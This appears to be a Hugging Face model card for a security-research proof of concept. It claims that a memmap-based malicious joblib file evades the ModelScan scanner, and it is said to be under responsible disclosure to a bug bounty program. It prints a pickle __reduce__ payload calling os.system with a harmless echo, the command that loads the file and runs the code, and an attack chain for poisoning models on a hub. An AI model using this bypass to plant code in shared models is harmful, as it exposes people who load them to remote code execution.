YAML Metadata Warning: empty or missing yaml metadata in repo card (https://huggingface.co/docs/hub/model-cards#model-card-metadata)

ModelScan Bypass - Memory-Mapped Array ⭐ PRIMARY FINDING

Security Research - ModelScan Bypass Technique

Overview

This repository contains a proof-of-concept demonstrating a bypass technique for ModelScan, a popular ML model security scanner. This technique allows malicious pickle-based model files to evade detection.

Technique

Memory-mapped array bypass

Uses joblib's memmap feature with malicious reduce method

ModelScan Result

SCANNED but found NO ISSUES ✅ (TRUE BYPASS)

File

  • exploit_memmap_bypass.joblib

Reproduction Steps

Testing with ModelScan

# Install ModelScan
pip install modelscan

# Download the exploit file from this repository
# Then scan it
modelscan scan -p exploit_memmap_bypass.joblib

Expected Result

SCANNED but found NO ISSUES ✅ (TRUE BYPASS)

Triggering the Exploit (⚠️ DO NOT RUN ON PRODUCTION)

import joblib

# WARNING: This will execute arbitrary code!
model = joblib.load('exploit_memmap_bypass.joblib')

Technical Details

This exploit uses Python's pickle __reduce__ method for RCE:

def __reduce__(self):
    import os
    return (os.system, ('echo "RCE executed!"',))

Why ModelScan misses this:

Uses joblib's memmap feature with malicious reduce method

Security Impact

Severity: HIGH

Attack Vector:

  1. Attacker creates malicious model using this technique
  2. Uploads to model hub (HuggingFace, etc.)
  3. Victim downloads and scans with ModelScan
  4. Scanner reports "No issues found!" or skips the file
  5. Victim loads model → RCE

Part of Larger Research

This is one of four bypass techniques discovered:

  1. Compression Mismatch
  2. Double Compression
  3. Corrupt Header
  4. Memmap Bypass ⭐ - PRIMARY FINDING

Disclosure

This research is being submitted to Huntr's bug bounty program for responsible disclosure.

Date: December 25, 2024 Researcher: Security Research Team

References

Disclaimer

⚠️ For Security Research Only

This file is provided for security research and vulnerability disclosure purposes only. Do not use this technique for malicious purposes. Loading this file will execute code.


Status: Under responsible disclosure to Huntr bug bounty program

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support